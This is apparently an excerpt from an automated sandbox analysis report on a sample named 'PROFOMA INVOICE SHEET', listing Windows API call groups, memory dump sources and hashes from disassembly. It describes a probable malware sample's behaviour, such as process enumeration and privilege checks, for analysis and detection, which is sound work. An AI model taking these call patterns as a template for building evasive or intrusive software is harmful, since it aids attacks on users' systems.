                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    • Opcode ID: 0ca82f43ecf73bff78a7cdc7224bfe7fa2987e61ac5188dfd6ad9bc7fe10213d
                                    • Instruction ID: a7286d5ec30854848a7bf3d95cc57a6877944e77ea0036c35614842f25a55bcc
                                    • Opcode Fuzzy Hash: 0ca82f43ecf73bff78a7cdc7224bfe7fa2987e61ac5188dfd6ad9bc7fe10213d
                                    • Instruction Fuzzy Hash: A5417A34A19214EFCF13CF98D894EA9B7F9BB49354F1A40A9E8149B2A1C731A941CB90
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 003916EB
                                      • Part of subcall function 00363A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00363A57
                                      • Part of subcall function 00363A3D: GetCurrentThreadId.KERNEL32 ref: 00363A5E
                                      • Part of subcall function 00363A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003625B3), ref: 00363A65
                                    • GetCaretPos.USER32(?), ref: 003916FF
                                    • ClientToScreen.USER32(00000000,?), ref: 0039174C
                                    • GetForegroundWindow.USER32 ref: 00391752
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    • Opcode ID: 615a5a706cde827a99276dd141cca80e5ce5d41b7bcac3092f7bddb811c10863
                                    • Instruction ID: 19dd0e09aca456d85433144c2c76dcb6ed199e81c60f8c8ecf6db457253fe5cf
                                    • Opcode Fuzzy Hash: 615a5a706cde827a99276dd141cca80e5ce5d41b7bcac3092f7bddb811c10863
                                    • Instruction Fuzzy Hash: 1B316475D01149AFDB01EFA9C891CAEB7FDEF48304B5080AAE415EB251DB31DE45CBA1
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0036D501
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0036D50F
                                    • Process32NextW.KERNEL32(00000000,?), ref: 0036D52F
                                    • CloseHandle.KERNEL32(00000000), ref: 0036D5DC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 67b13becbdc5dfa8fda5a3a6a0ad140c60d315b7ecf925c18443af635b8d1852
                                    • Instruction ID: a0ebf017322b86793bf5702213da037e111a694473ca7b3703aba5fc2805a7a2
                                    • Opcode Fuzzy Hash: 67b13becbdc5dfa8fda5a3a6a0ad140c60d315b7ecf925c18443af635b8d1852
                                    • Instruction Fuzzy Hash: 9931B8715083009FD306EF54C891AAFBBF8EF99354F14452DF582871A2EB719944CB92
                                    APIs
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    • GetCursorPos.USER32(?), ref: 00399001
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00357711,?,?,?,?,?), ref: 00399016
                                    • GetCursorPos.USER32(?), ref: 0039905E
                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00357711,?,?,?), ref: 00399094
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                    • String ID:
                                    • API String ID: 2864067406-0
                                    • Opcode ID: 872ea858dd46cef540e8b6408dd401d6ebef430ec81e9b7a312b0b13191c192c
                                    • Instruction ID: 226593210f522485851ced0d9c60dd56910e959b8844acb4dbf206e6a507b2d5
                                    • Opcode Fuzzy Hash: 872ea858dd46cef540e8b6408dd401d6ebef430ec81e9b7a312b0b13191c192c
                                    • Instruction Fuzzy Hash: 15219F35600018FFCF278F99D858FEA7BB9EB4A350F05409AF9154B261C3329DA0DB60
                                    APIs
                                    • GetFileAttributesW.KERNEL32(?,0039CB68), ref: 0036D2FB
                                    • GetLastError.KERNEL32 ref: 0036D30A
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0036D319
                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0039CB68), ref: 0036D376
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                    • String ID:
                                    • API String ID: 2267087916-0
                                    • Opcode ID: 5dfb24459bcb769a3739decd0f95d868b2440112b017dd7b9dee66015e0a3f46
                                    • Instruction ID: 3cb4116b9cda4b7d60617fb38762c21624f6dfd7c47aeb4775325f818bd176f8
                                    • Opcode Fuzzy Hash: 5dfb24459bcb769a3739decd0f95d868b2440112b017dd7b9dee66015e0a3f46
                                    • Instruction Fuzzy Hash: 3A21A374A053019FC712DF28C88186A77E8EE56324F608A1EF499CB3E1E731D945CB93
                                    APIs
                                      • Part of subcall function 00361014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0036102A
                                      • Part of subcall function 00361014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00361036
                                      • Part of subcall function 00361014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00361045
                                      • Part of subcall function 00361014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0036104C
                                      • Part of subcall function 00361014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00361062
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003615BE
                                    • _memcmp.LIBVCRUNTIME ref: 003615E1
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00361617
                                    • HeapFree.KERNEL32(00000000), ref: 0036161E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                    • String ID:
                                    • API String ID: 1592001646-0
                                    • Opcode ID: 950a2733087c1aba0386404427ce0fcdda6825f2c86385052e47685fc958c124
                                    • Instruction ID: eae9c7da524c09775642fc981fdc018adb8f3fc6023fadf3baf4a96723340a4d
                                    • Opcode Fuzzy Hash: 950a2733087c1aba0386404427ce0fcdda6825f2c86385052e47685fc958c124
                                    • Instruction Fuzzy Hash: 8A21AC31E00108EFDF11DFA8C945BEEBBB8EF44354F098459E841AB245E731AA05CBA0
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0039280A
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00392824
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00392832
                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00392840
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Long$AttributesLayered
                                    • String ID:
                                    • API String ID: 2169480361-0
                                    • Opcode ID: 4551b7c7d05713d682700c644cd58dda3fe3cdde7d9d83d3204f510d141478a7
                                    • Instruction ID: 785846d1ff8323ab5d78cbeef98c46ca3634128c93a37271dbf8eb97a5c4d06a
                                    • Opcode Fuzzy Hash: 4551b7c7d05713d682700c644cd58dda3fe3cdde7d9d83d3204f510d141478a7
                                    • Instruction Fuzzy Hash: E521C131209911BFDB16DB24CC54FAB7B99AF46324F158159F4268B6E2CB71FC42C790
                                    APIs
                                      • Part of subcall function 00368D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0036790A,?,000000FF,?,00368754,00000000,?,0000001C,?,?), ref: 00368D8C
                                      • Part of subcall function 00368D7D: lstrcpyW.KERNEL32(00000000,?,?,0036790A,?,000000FF,?,00368754,00000000,?,0000001C,?,?,00000000), ref: 00368DB2
                                      • Part of subcall function 00368D7D: lstrcmpiW.KERNEL32(00000000,?,0036790A,?,000000FF,?,00368754,00000000,?,0000001C,?,?), ref: 00368DE3
                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00368754,00000000,?,0000001C,?,?,00000000), ref: 00367923
                                    • lstrcpyW.KERNEL32(00000000,?,?,00368754,00000000,?,0000001C,?,?,00000000), ref: 00367949
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00368754,00000000,?,0000001C,?,?,00000000), ref: 00367984
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    • Opcode ID: 05cfb0dcecea5010dfc32a6ac210764bd2c1d51899452ee7f942d983194c5d41
                                    • Instruction ID: aa18a0df29c8ba94f40c7b1cdcdd2206ab1dd654a0068e95bd31b12cb03a46fe
                                    • Opcode Fuzzy Hash: 05cfb0dcecea5010dfc32a6ac210764bd2c1d51899452ee7f942d983194c5d41
                                    • Instruction Fuzzy Hash: 6611E93A204302AFDB165F39D845D7A77E9FF49354B50802AF946CB268EB719811C761
                                    APIs
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00397D0B
                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00397D2A
                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00397D42
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0037B7AD,00000000), ref: 00397D6B
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID:
                                    • API String ID: 847901565-0
                                    • Opcode ID: 1983dabb9276a7234804a1d8723bf5ed55687e25889598eb1cecf75cc71ca0d4
                                    • Instruction ID: a29dc8f63fc6a2ff68c73c5e1dd025ecf8eefc55157d7ffff7d0891f72abaad2
                                    • Opcode Fuzzy Hash: 1983dabb9276a7234804a1d8723bf5ed55687e25889598eb1cecf75cc71ca0d4
                                    • Instruction Fuzzy Hash: 8311CD72225615AFCF129F28DC04AA63BA8AF46360F168325F839CB2F0D7318D51CB90
                                    APIs
                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 003956BB
                                    • _wcslen.LIBCMT ref: 003956CD
                                    • _wcslen.LIBCMT ref: 003956D8
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00395816
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend_wcslen
                                    • String ID:
                                    • API String ID: 455545452-0
                                    • Opcode ID: 72603451784b724a873bd395ddeb58093b905250de9664af8827f7b9a16dc184
                                    • Instruction ID: 52a5da446298e0708086a5efaa79fcc6531182bdfd67c79bc480685c7769914f
                                    • Opcode Fuzzy Hash: 72603451784b724a873bd395ddeb58093b905250de9664af8827f7b9a16dc184
                                    • Instruction Fuzzy Hash: 4211B275A04618A6DF23DFA5DC85AEE77BCEF11764F104026FA15DA081EBB0DAC4CB60
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00361A47
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00361A59
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00361A6F
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00361A8A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: b8428e4e2bfffcfb6238df97931f41e1bd0cec4c39c3835f1f3b439f52115ead
                                    • Instruction ID: caae8b7b2bdfee8e235a8f049898be653de5ba864de9f78c0109a7fb334899e9
                                    • Opcode Fuzzy Hash: b8428e4e2bfffcfb6238df97931f41e1bd0cec4c39c3835f1f3b439f52115ead
                                    • Instruction Fuzzy Hash: CF11573A901219FFEB11DBA4C984FADFB78EB08350F244092EA00B7294C671AE50DB94
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 0036E1FD
                                    • MessageBoxW.USER32(?,?,?,?), ref: 0036E230
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0036E246
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0036E24D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 2880819207-0
                                    • Opcode ID: 8d81a8bd7a941b7bff3c1e23a7b1eefb27013e7acc417d4ff1766c0bef8b10ff
                                    • Instruction ID: d73be572cea52244055b989ca57058c9da19d4f8835db785cc89846cc309cb21
                                    • Opcode Fuzzy Hash: 8d81a8bd7a941b7bff3c1e23a7b1eefb27013e7acc417d4ff1766c0bef8b10ff
                                    • Instruction Fuzzy Hash: 5711DBBA904254BFC703AFA8EC09A9E7FADAB45310F048656F924D3291D675CD0487A0
                                    APIs
                                    • CreateThread.KERNEL32(00000000,?,0032CFF9,00000000,00000004,00000000), ref: 0032D218
                                    • GetLastError.KERNEL32 ref: 0032D224
                                    • __dosmaperr.LIBCMT ref: 0032D22B
                                    • ResumeThread.KERNEL32(00000000), ref: 0032D249
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                    • String ID:
                                    • API String ID: 173952441-0
                                    • Opcode ID: 357f0872078b149449058ff340c7ae502c64beb4f62b61801b17546bbcef6652
                                    • Instruction ID: e4c6455111882b0ebff985dda2b44b5500fc97d66527ead06431fa0bd2f571ff
                                    • Opcode Fuzzy Hash: 357f0872078b149449058ff340c7ae502c64beb4f62b61801b17546bbcef6652
                                    • Instruction Fuzzy Hash: 5801D636415224BBDB135BA5FC09BAE7A6DDF81330F114619F925961D0CB718901C7A0
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0030604C
                                    • GetStockObject.GDI32(00000011), ref: 00306060
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0030606A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateMessageObjectSendStockWindow
                                    • String ID:
                                    • API String ID: 3970641297-0
                                    • Opcode ID: 19a85b3c0556e7fc41b753f609be75f34273f6c1d86b06fd3f7a192d2371dd0e
                                    • Instruction ID: e383ed6c443f0d0aeb7d6af15935e455b3a0fd92dececc416b7103ab455dfade
                                    • Opcode Fuzzy Hash: 19a85b3c0556e7fc41b753f609be75f34273f6c1d86b06fd3f7a192d2371dd0e
                                    • Instruction Fuzzy Hash: 1B11AD72506508BFEF134FA4DC65EEBBBADEF083A4F050212FA0452050C7329C60EBA0
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00323B56
                                      • Part of subcall function 00323AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00323AD2
                                      • Part of subcall function 00323AA3: ___AdjustPointer.LIBCMT ref: 00323AED
                                    • _UnwindNestedFrames.LIBCMT ref: 00323B6B
                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00323B7C
                                    • CallCatchBlock.LIBVCRUNTIME ref: 00323BA4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                    • String ID:
                                    • API String ID: 737400349-0
                                    • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                    • Instruction ID: dbbde2bc19ad5f165bace0c7f5b6639489c8659eaba3721a26f2f14f74f134bc
                                    • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                    • Instruction Fuzzy Hash: 8E012932100158BBDF126E95EC42EEB3F6AEF48754F054014FE485A121C736E961DBA0
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003013C6,00000000,00000000,?,0033301A,003013C6,00000000,00000000,00000000,?,0033328B,00000006,FlsSetValue), ref: 003330A5
                                    • GetLastError.KERNEL32(?,0033301A,003013C6,00000000,00000000,00000000,?,0033328B,00000006,FlsSetValue,003A2290,FlsSetValue,00000000,00000364,?,00332E46), ref: 003330B1
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0033301A,003013C6,00000000,00000000,00000000,?,0033328B,00000006,FlsSetValue,003A2290,FlsSetValue,00000000), ref: 003330BF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: b57bb966ea9cb284127da47aae9801c83b5a5819ef024d0996b3bb4230a484a5
                                    • Instruction ID: cae997e08d151ba5c9f21f74adae561b39da591f4079c25e63c5e548ea603be0
                                    • Opcode Fuzzy Hash: b57bb966ea9cb284127da47aae9801c83b5a5819ef024d0996b3bb4230a484a5
                                    • Instruction Fuzzy Hash: 2001F732312622ABCB374B78ACC4A677B9CAF05B61F218621F947E7150C722D901C6E0
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0036747F
                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00367497
                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003674AC
                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003674CA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
